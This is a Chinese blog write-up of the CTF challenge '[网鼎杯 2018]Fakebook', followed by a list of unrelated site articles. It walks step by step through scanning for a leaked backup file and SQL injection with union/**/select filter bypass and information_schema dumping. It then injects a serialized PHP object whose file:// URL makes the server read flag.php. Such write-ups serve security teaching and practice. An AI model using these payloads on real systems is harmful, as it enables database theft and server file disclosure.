[网鼎杯 2018]Fakebook
2021/4/19 18:29:39
本文主要是介绍[网鼎杯 2018]Fakebook,对大家解决编程问题具有一定的参考价值,需要的程序猿们随着小编来一起学习吧!
[网鼎杯 2018]Fakebook
题目:
打开环境,得到:
刚一来就直接整了两个最显眼的东西:
一个login
,一个join
接下来就说说我做这道题的思路:
最初我是想随便注册一个join:
点击join,发现报错:
告诉我们blog是不合法的,那它应该是对blog做了过滤(盲猜应该有后台源码泄露,直接就拿扫后台工具扫一下:
发现有个/robots.txt与/user.php.bak,(心里狂喜
接下来直接访问就行了
得到:
<?php class UserInfo { public $name = ""; public $age = 0; public $blog = ""; public function __construct($name, $age, $blog) { $this->name = $name; $this->age = (int)$age; $this->blog = $blog; } function get($url) { $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); $output = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); if($httpCode == 404) { return 404; } curl_close($ch); return $output; } public function getBlogContents () { return $this->get($this->blog); } public function isValidBlog () { $blog = $this->blog; return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog); } }
可以看到确实是对blog做了过滤的,所以直接构造符合正则的blog就好:
我这里用的blog是:
123.hhh
点击join,即可来到这个界面:
emmmmmmm
好像还是没什么线索,不过还可以继续点击我们的username,就试试看:
见鬼,这又是个什么界面?
不过在卡了一会过后,突然看到url上面出现了个no=1
???,心里又是狂喜,(这应该是个注入点了
二话不说,直接开始进行注入:
首先输入了no=1'
,发现了报错信息:
确实是个sql注入点,并且可以拿到网站的绝对路径:/var/www/html/
接下来就是考虑如何进行sql注入了,先试下常规的爆字段吧:
....... no=1 order by 4 no=1 order by 5
可以看到,字段数为4(居然没有任何过滤?)
接着就查找回显点:
no=2 union select 1,2,3,4
结果就报错了
看来还是进行了过滤的呀,慢慢测试发现是对union select
这个字符串做了过滤,这好办,直接绕过union select
的空格就好了,构造payload:
no=2 union/**/select 1,2,3,4
得到:
可以发现回显点为2,接着就要去爆库了,构造payload:
no=2 union/**/select 1,database(),3,4
得到:
可知库名是fakebook,继续构造payload:
no=2 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='fakebook'
得到:
表名为users,继续:
no=2 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='users'
得到:
列名为:
no,username,passwd,data,USER,CURRENT_CONNECTIONS,TOTAL_CONNECTIONS
一下子出现这么多列,有点不知从何入手,不过可以靠逻辑推理来下手,我们已经知道了no,username,passwd,但还没见过data,所以就先从data下手,构造payload:
no=2 union/**/select 1,data,3,4 from users
得到:
可以看到这是一个序列化后的Userinfo对象(这怎么又成了反序列化的内容了??
emmmmmmmmm
确实有点没有头绪了,这个是序列化data后的内容,难道是要让我们传入反序列化后的data,最终得到flag?
但好像没有可以要反序列化的内容了,所以我总觉得丢了点什么,于是又从头开始缕头绪:
想着会不会是没扫到什么东西,于是又用御剑扫了一下:
果然,有个flag.php文件,访问试试看
好吧,什么都没有
然后又回到这个界面:
查看源码,hjh,原来还有个提示:
右边的iframe
标签的src属性有个data:text/html;base64,
,一看就知道是用了伪协议的
现在就有点头绪了,可能是想通过伪协议来访问flag.php,再输入反序列化的内容,然后在iframe标签里应该可以得到flag,说干就干:
先得到序列化的信息:
<?php class UserInfo{ public $name='o3Ev'; public $age=1; public $blog='file:///var/www/html/flag.php'; } $a=new UserInfo(''); print_r(serialize($a)); ;?>
构造payload:
no=2 union/**/select 1,'O:8:"UserInfo":3:{s:4:"name";s:4:"o3Ev";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}',3,4
但发现报错了:
心累(实在做不起走了
然后我就把这道题放了下,第二天又才来继续肝的,于是又点进来了这个界面:
突然发现名字上面的username
,然后想到第一天肝这道题时,查到这个位置回显点是2,也正好是那个表名的顺序,所以有可能select 1,2,3,4的对应位置就是no username passwd data
的对应点,是不是也得试了才知道,构造payload:
no=2 union/**/select 1,2,3,'O:8:"UserInfo":3:{s:4:"name";s:4:"o3Ev";s:3:"age";i:1;s:4:"blog";s:29:"file:///var/www/html/flag.php";}'
得到:
可以看到页面正常了,说明应该是对了,接下来直接去源码查看iframe
即可:
得到:data:text/html;base64,PD9waHANCg0KJGZsYWcgPSAiZmxhZ3tiMjRjMzA0Mi0xMmM3LTQ4NTYtOGZiYS03NzI0OGQyYjIyZmN9IjsNCmV4aXQoMCk7DQo=
直接base64解密就可以拿到flag
这篇关于[网鼎杯 2018]Fakebook的文章就介绍到这儿,希望我们推荐的文章对大家有所帮助,也希望大家多多支持为之网!
- 2024-11-23Springboot应用的多环境打包入门
- 2024-11-23Springboot应用的生产发布入门教程
- 2024-11-23Python编程入门指南
- 2024-11-23Java创业入门:从零开始的编程之旅
- 2024-11-23Java创业入门:新手必读的Java编程与创业指南
- 2024-11-23Java对接阿里云智能语音服务入门详解
- 2024-11-23Java对接阿里云智能语音服务入门教程
- 2024-11-23JAVA对接阿里云智能语音服务入门教程
- 2024-11-23Java副业入门:初学者的简单教程
- 2024-11-23JAVA副业入门:初学者的实战指南